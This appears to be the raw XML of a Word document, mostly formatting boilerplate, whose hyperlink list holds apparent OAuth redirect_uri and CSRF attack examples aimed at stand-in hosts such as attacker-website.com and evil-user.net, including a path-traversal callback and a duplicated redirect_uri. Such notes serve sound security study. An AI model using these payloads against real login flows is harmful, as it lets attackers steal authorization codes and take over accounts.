      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1159737054">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1178618889">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1197350671">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1209219392">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1213619633">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1217357992">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1224101822">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1253709802">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1256669286">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1351447782">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1363936684">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1366061693">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1428651044">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1438990527">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1460732208">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1497305654">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1506507585">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1551381584">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1566598572">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1610120708">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1707828970">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1759249486">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1774979781">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1841967282">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1868058470">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1942643878">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1955095949">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1970864599">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1983266442">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2015839789">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2118402962">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="212599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rect_uri.attacker-website.com/csrf-attac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lient-app.com/oauth/callback/../../example/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auth-authorization-server.com/?client_id=123&amp;redirect_uri=client-app.com/callback&amp;redirect_uri=evil-user.net" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:&amp;@foo.evil-user.net" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://attacker-website.com/csrf-attack?redirect_urim"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84B38-BC2B-436F-81C7-545840C6A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To.Nguyen Truong An IT-QF</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>To.Nguyen Truong An IT-QF</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-09-15T16:36:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-10-23T18:04:00Z</dcterms:modified>
</cp:coreProperties>
</file>